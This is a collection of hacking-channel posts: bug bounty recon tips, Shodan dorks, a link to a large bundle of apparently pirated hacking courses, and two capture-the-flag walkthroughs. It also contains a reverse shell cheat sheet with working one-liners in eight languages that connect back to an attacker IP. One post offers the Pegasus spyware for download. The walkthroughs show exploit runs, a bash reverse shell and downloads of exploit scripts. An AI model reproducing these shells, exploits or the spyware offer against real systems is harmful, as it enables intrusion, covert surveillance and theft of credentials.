Bug bounty Tips

•  Amass •  Amass + Nuclei: Finding domain •  Amass + Nuclei 2: Finding domain •  Finding subdomains with jsubfinder + httpx •  Using FFUF to finding RCE •  Full Account Takeover Technique in API/Register •  Oneliner Search JS domain using subjs, anew and httpx •  Shodan queries to search Scada, IoT, Router Devices •  Screnshoot page using aquatone using domain files •  oneliner using shodan and nuclei to scanning hosts •  Oneliner finding subdomain using gospider , assetfinder , amass and nuclei •  Oneliner portscan and subdomain discovery using subfinder , cf-check, naabu and httprobe •  Oneliner search SSRF using subfinder , httpx and qsreplace •  Oneliner recon domain and subdomains using chaos, gospider , findomain, assetfinder , amass, httpx and anew •  Oneliner search xss using kxss, xargs and httpx •  Google dork to discovery api exposure •  Create script to finder and test sql injection •  Oneliner find xss using subfinder , httpx, katana, gxss, kxss and dalfox •  Domain enumeration and discovery files using ffuf, httpx and findomain •  oneliner find open redirect using waybackurls, httpx, gf, anew and nuclei •  Oneliner complete enumeration xss, lfi, ssrf in domain using gauplus, anew, gxss, gf, qsreplace, httpx and SecretFinder •  Oneliner check cloudflare using subfinder , dnsx, cf-check, naabu •  Oneliner recon jira using uncover with shodan, censys and fofa and vulnerability scan with nuclei •  Oneliner recon subdomain using assetfinder , httpx, xargs, waybackurls and nuclei vulnerability scan •  Oneliner extract js using haktrails, httpx, getjs, anew, tojson •  Oneliner LFI using gau, gf, qsreplace and xargs

🔰 𝑪𝒀𝑩𝑬𝑹 𝑺𝑬𝑪𝑼𝑹𝑰𝑻𝒀 𝑪𝑶𝑳𝑳𝑬𝑪𝑻𝑰𝑶𝑵 🔰 𝑪𝒐𝒍𝒍𝒆𝒄𝒕𝒊𝒐𝒏 𝑳𝒊𝒔𝒕: ●𝐁𝐮𝐠 𝐁𝐨𝐮𝐧𝐭𝐲 𝐀𝐧𝐝𝐫𝐨𝐢𝐝 𝐇𝐚𝐜𝐤𝐢𝐧𝐠 ●𝐁𝐮𝐝 𝐁𝐨𝐮𝐧𝐭𝐲 𝐇𝐮𝐧𝐭𝐢𝐧𝐠 𝐆𝐮𝐢𝐝𝐞 𝐭𝐨 𝐚𝐧 𝐀𝐝𝐯𝐚𝐧𝐜𝐞𝐝 𝐄𝐚𝐫𝐧𝐢𝐧𝐠 𝐌𝐞𝐭𝐡𝐨𝐝 ●𝐁𝐮𝐠 𝐁𝐨𝐮𝐧𝐭𝐲 𝐇𝐮𝐧𝐭𝐢𝐧𝐠 𝐎𝐟𝐟𝐞𝐧𝐬𝐢𝐯𝐞 𝐀𝐩𝐩𝐫𝐨𝐚𝐜𝐡 𝐭𝐨 𝐇𝐮𝐧𝐭 𝐁𝐮𝐠𝐬 ●𝐁𝐮𝐠 𝐁𝐨𝐮𝐧𝐭𝐲 𝐖𝐞𝐛 𝐇𝐚𝐜𝐤𝐢𝐧𝐠 ●𝐂𝐈𝐒𝐒𝐏 𝐟𝐮𝐥𝐥 𝐂𝐨𝐮𝐫𝐬𝐞 𝟐𝟎𝟐𝟎 ●𝐇𝐚𝐧𝐝𝐬 𝐨𝐧 𝐏𝐞𝐧𝐞𝐭𝐫𝐚𝐭𝐢𝐨𝐧 𝐓𝐞𝐬𝐭𝐢𝐧𝐠 𝐋𝐚𝐛𝐬 ●𝐋𝐞𝐚𝐫𝐧 𝐂𝐫𝐚𝐜𝐤𝐢𝐧𝐠 𝐖𝐈-𝐅𝐈 𝐩𝐚𝐬𝐬𝐰𝐨𝐫𝐝𝐬 𝐤𝐞𝐲𝐬 𝐖𝐄𝐏, 𝐖𝐏𝐀 𝐖𝐏𝐀𝟐 ●𝐋𝐞𝐚𝐫𝐧 𝐏𝐲𝐭𝐡𝐨𝐧 & 𝐄𝐭𝐡𝐢𝐜𝐚𝐥 𝐇𝐚𝐜𝐤𝐢𝐧𝐠 𝐟𝐫𝐨𝐦 𝐒𝐜𝐫𝐚𝐭𝐜𝐡 ●𝐌𝐚𝐬𝐭𝐞𝐫𝐬 𝐢𝐧 𝐄𝐭𝐡𝐢𝐜𝐚𝐥 𝐇𝐚𝐜𝐤𝐢𝐧𝐠 𝐰𝐢𝐭𝐡 𝐀𝐧𝐝𝐫𝐨𝐢𝐝 ●𝐏𝐫𝐚𝐜𝐭𝐢𝐜𝐚𝐥 𝐁𝐮𝐠 𝐁𝐨𝐮𝐧𝐭𝐲 ●𝐏𝐫𝐚𝐜𝐭𝐢𝐜𝐚𝐥 𝐄𝐭𝐡𝐢𝐜𝐚𝐥 𝐇𝐚𝐜𝐤𝐢𝐧𝐠 ●𝐑𝐞𝐝𝐓𝐞𝐚𝐦 𝐁𝐥𝐮𝐞𝐩𝐫𝐢𝐧𝐭 – 𝐀 𝐮𝐧𝐢𝐪𝐮𝐞 𝐠𝐮𝐢𝐝𝐞 𝐭𝐨 𝐄𝐭𝐡𝐢𝐜𝐚𝐥 𝐇𝐚𝐜𝐤𝐢𝐧𝐠 ●𝐒𝐩𝐥𝐮𝐧𝐤 𝐇𝐚𝐧𝐝𝐬 𝐨𝐧 𝐭𝐡𝐞 𝐂𝐨𝐦𝐩𝐥𝐞𝐭𝐞 𝐃𝐚𝐭𝐚 𝐀𝐧𝐚𝐥𝐲𝐭𝐢𝐜𝐬 ●𝐓𝐡𝐞 𝐂𝐨𝐦𝐩𝐥𝐞𝐭𝐞 𝐄𝐭𝐡𝐢𝐜𝐚𝐥 𝐇𝐚𝐜𝐤𝐢𝐧𝐠 𝐂𝐨𝐮𝐫𝐬𝐞 ●𝐓𝐡𝐞 𝐂𝐨𝐦𝐩𝐥𝐞𝐭𝐞 𝐇𝐚𝐜𝐤𝐢𝐧𝐠 𝐂𝐨𝐮𝐫𝐬𝐞, 𝐛𝐲 𝐆𝐞𝐫𝐫𝐢 𝐁𝐚𝐧𝐟𝐢𝐞𝐥𝐝 ●𝐓𝐡𝐞 𝐂𝐨𝐦𝐩𝐥𝐞𝐭𝐞 𝐍𝐚𝐦𝐩 𝐍𝐨-𝐍𝐨𝐧𝐬𝐞𝐧𝐬𝐞 𝐂𝐨𝐮𝐫𝐬𝐞 ●𝐖𝐢-𝐅𝐢 𝐄𝐭𝐡𝐢𝐜𝐚𝐥𝐇𝐚𝐜𝐤𝐢𝐧𝐠 𝐰𝐢𝐭𝐡 𝐊𝐚𝐢𝐥 ●𝐖𝐢𝐧𝐝𝐨𝐰𝐬 𝐏𝐫𝐢𝐯𝐢𝐥𝐞𝐠𝐞 𝐄𝐬𝐜𝐚𝐥𝐚𝐭𝐢𝐨𝐧 𝐟𝐨𝐫 𝐁𝐞𝐠𝐢𝐧𝐞𝐞𝐫𝐬 ●𝐖𝐢𝐧𝐝𝐨𝐰𝐬 𝐏𝐫𝐢𝐯𝐢𝐥𝐞𝐠𝐞 𝐄𝐬𝐜𝐚𝐥𝐚𝐭𝐢𝐨𝐧 𝐟𝐨𝐫 𝐎𝐒𝐂𝐏 & 𝐁𝐞𝐲𝐨𝐧𝐝! 📂Size: 103.7GB+ ▬▬▬▬▬▬▬▬▬▬▬▬▬▬ 🔗 GDrive Link : https://drive.google.com/drive/folders/183SSU6GShal0mzAckd6m9kk0eF2KpcEV?usp=sharing https://t.me/bugbounty_tech ▬▬▬▬▬▬▬▬▬▬▬▬▬▬

Interesting way to use LEGBA (https://github.com/evilsocket/legba) #bruteforce tool from twitter.com/evilsocket - enumeration valid emails for G Suite domain. Read more about LEGBA: https://www.evilsocket.net/2023/11/02/Enumerate-Bruteforce-Attack-All-The-Things-Presenting-Legba/

Some Shodan Dorks that might useful in Bug Bounty. 1. org:"http://target. com" 2. http.status:"<status_code>" 3. product:"<Product_Name>" 4. port:<Port_Number> “Service_Message” 5. port:<Port_Number> “Service_Name” 6. http.component:"<Component_Name>" 7. http.component_category:"<Component_Category> 8. http.waf:"<firewall_name>" 9. http.html:"<Name>" 10. http.title:"<Title_Name>" 11. ssl.alpn:"<Protocol>" 12. http.favicon.hash:"<Favicon_Hash>" 13. net:"<Net_Range>" (for e.g. 104.16.100.52/32) 14. http://ssl.cert.subject.cn:"<http://Domain .com>" 15. asn:"<ASnumber>" 16. hostname:"<hosthame>" 17. ip:"<IP_Address>" 18. all:"<Keyword>" 19. “Set-Cookie: phpMyAdmin” 20. “Set-Cookie: lang=" 21. “Set-Cookie: PHPSESSID" 22. “Set-Cookie: webvpn” 23. “Set-Cookie:webvpnlogin=1" 24. “Set-Cookie:webvpnLang=en” 25. “Set-Cookie: mongo-express=" 26. “Set-Cookie: user_id=" 27. “Set-Cookie: phpMyAdmin=" 28. “Set-Cookie: _gitlab_session” 29. “X-elastic-product: Elasticsearch” 30. “x-drupal-cache” 31. “access-control-allow-origin” 32. “WWW-Authenticate” 33. “X-Magento-Cache-Debug” 34. “kbn-name: kibana”

Pegasus Full Pegasus is a spyware developed by the Israeli cyber-arms company NSO Group that is designed to be covertly and remotely installed on mobile phones running iOS and Android. Download Link:- CyberSleuthPacks/Pegasus NOTE:-Please do not run it on your native windows

📚 A gentleman's set for a beginner of 4 books on hacking. 1. Hacking like a porn star. “When we sympathize with suffering, we act like all people; making them easier, like God.” Horace Mann 2. Hacking with the skill of God. “Luck is when preparation meets opportunity.” Seneca 3. Investigate cybercrimes like a rock star. “When I'm standing at the starting gate, it's just me and the slope.” Mikaela Shiffrin 4. Hacking like a legend. “I am a blank slate, and therefore I can create whatever I want.” Tobey Maguire ⏺ Read books #book //❓ cyber in network security

Reverse Shell Cheat Sheet Bash; bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 Python; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' PERL; perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' PHP; php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' Ruby; ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' Netcat; nc -e /bin/sh 10.0.0.1 1234 Java; r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() xterm; xterm -display 10.0.0.1:1

Journey through Analytical CTF: Unveiling Vulnerabilities and Escalating Privileges Recently, I had the exhilarating experience of delving into the Analytical CTF, where every step seemed like a puzzle waiting to be solved. Here's a detailed account of my journey: Discovering the Target Upon initiating the challenge, I quickly identified the target IP as 10.10.11.233 and added it to my /etc/hosts file for easy access. Unveiling Metabase Vulnerability My exploration began with a visit to analytical.htb, revealing a login page under data.analytical.htb. A swift investigation led me to discover a potential Remote Code Execution (RCE) vulnerability within Metabase, marked as CVE-2023-38646. After scouring through resources, I stumbled upon the proof of concept (POC) on GitHub:

git clone https://github.com/securezeron/CVE-2023-38646

To exploit this vulnerability, I executed the following commands:

python3 exploit.py --rhost http://data.analytical.htb --lhost <ip> --port <4444>
nc -lnvp 4444

These commands provided crucial insights into the system, revealing "/proc/self/environ" and uncovering login credentials:

META_USER=meta********
META_PASS=An4l**************8

Gaining Initial Access With the obtained credentials, I swiftly gained SSH access:

ssh metalytics@analytical.htb

This breakthrough enabled me to acquire the user flag:

user.txt : 9d1f6be*************************

Privilege Escalation Endeavors Eager to escalate privileges, I probed for sudo permissions but to no avail. Nevertheless, I gleaned system information using commands such as id, uid, and uname -a, revealing the system's configuration:

Linux analytics 6.2.0-25-generic #25~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC Wed Jun 28 09:55:23 UTC 2 x86_64 x86_64 x86_64 GNU/Linux

Further exploration led me to uncover vulnerabilities, notably the "CVE-2023-2640 and CVE-2023-32629," also known as GameOver(lay). Referencing available POCs, I crafted an exploit script:

wget https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629/blob/main/exploit.sh

The script, designed to exploit Ubuntu privilege escalation vulnerabilities, facilitated my journey towards root privileges:

bash exploit.sh

Root Access Achieved Executing the exploit script proved fruitful, granting me root access to the system:

root.txt : 9b30872bc********************

With this, I concluded my expedition through the Analytical CTF, armed with newfound knowledge and triumphs. The journey underscored the importance of meticulous exploration and resourcefulness in navigating complex cybersecurity challenges.

Hey, guys i am looking for a good trainer, from bangalore, If anyone here intrested or anyone you know from bangalore, do let me know. 😄

Target IP: 10.10.11.2* Upon initiating the reconnaissance phase with Nmap, I unearthed several open ports: - Port 22 (SSH) - Port 80 (HTTP) - Port 2170 (eyetv) Proceeding with a meticulous Gobuster scan, I uncovered a few directories such as /images, /css, and /js, all of which returned a discouraging 403 Forbidden error. Undeterred, I decided to explore the DNS, where I stumbled upon a promising subdomain, dev, which I promptly added to my /etc/hosts file for further investigation. Next, I randomly got the idea to check robots.txt file and struck gold —a directory named administrator, suggesting that the site was running Joomla. Furthermore, my interest piqued upon discovering a recently disclosed CVE: 2023-23752. I quickly checked GitHub and stumbled upon a finding an exploit at [Acceis/exploit-CVE-2023-23752](https://github.com/Acceis/exploit-CVE-2023-23752?tab=readme-ov-file). Executing the exploit with Ruby, I targeted the vulnerable URL and successfully obtained login credentials: - Username: le*** - DB Password: P4nth*************## With the acquired credentials, I gained administrative access to the system. Navigating to System > Administrator Templates > index.php, I leveraged a bash script to establish a reverse shell:

# exec("/bin/bash -c 'bash -i >& /tcp/dev 10.10.14.*/4433 0>&1'")

Subsequently, I listened on port 4433 with Netcat and stabilized the shell using Python's pty:

stty raw -echo; fg

Aware that MySQL was operational, I accessed it with:

mysql -u lew** -p

Inside the Joomla database, I explored the sd4fg_user table, revealing encrypted passwords for both 'lewis' and 'logan'. Having cracked 'logan's password using John the Ripper— teq********** I successfully logged in via SSH. Voilà! I secured the user.txt: d6a93fb199df******************** ### Privilege Escalation: Upon inspecting commands running under 'logan', I singled out /usr/bin/apport-cli. Upon executing sudo /usr/bin/apport-cli -f, a menu prompted me to choose options 1, 2, or V for viewing the report. Inspecting the environment variables, I noticed:

== ProcEnviron =================================
LANG=en_US.UTF-8
TERM=xterm-256color
PATH=(custom, no user)
SHELL=/bin/bash

Lastly, a tantalizing '!' prompted me to execute it, granting me root access. Eureka! I triumphantly retrieved the root.txt: 85518faf01*************** With that, I successfully navigated through the intricate maze of challenges, honing my cybersecurity skills along the way. Until the next CTF adventure, stay curious and keep exploring!

CTF Walkthrough: DEvvortex - Gaining Root Access Recently, I had the opportunity to delve into a captivating Capture The Flag (CTF) challenge where I encountered a series of intriguing hurdles. Let me walk you through the steps I took to conquer this challenge.

Check out, how to use the hackerone

Ready to level up your Bug Bounty game? Read through to discover the top 5 mistakes to avoid! 🛡️💻

Top 8 cyber attacks of 2024